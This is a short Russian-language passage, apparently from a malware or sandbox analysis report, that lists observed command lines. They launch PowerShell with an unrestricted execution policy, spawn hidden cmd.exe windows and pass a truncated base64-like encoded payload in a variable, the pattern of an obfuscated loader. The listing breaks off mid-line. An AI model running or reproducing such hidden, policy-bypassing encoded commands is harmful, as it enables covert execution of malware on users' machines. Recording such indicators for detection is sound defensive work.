Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $BtJH = 'AAAAAAAAAAAAAAAAAAAAAFQvl61BT40x1DKrDS7GaY5+hPKVdIDUi04eQ852ypIrXqWm4fi7bMM1o...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe $BtJH = 'AAAAAAAAAAAAAAAAAAAAAFQvl61BT40x1DKrDS7GaY5+hPKVdIDUi04eQ852ypIrXqWm4fi7bMM1oZpaOUWbf9z1gzKQ1L8AC5mFj/cqrFY3dkT+RCxpFWwGpytUEJttuqRqdt1G0bKPuYQhWT8+aMSYfFl0K42zgMFORS...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe $BtJH = 'AAAAAAAAAAAAAAAAAAAAAFQvl61BT40x1DKrDS7GaY5+hPKVdIDUi04eQ852ypIrXqWm4fi7bMM1oZpaOUWbf9z1gzKQ1L8AC5mFj/cqrFY3dkT+RCxpFWwGpytUEJttuqRqdt1G0bKPuYQhWT8+aMSYfFl0K42zgMFORS...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -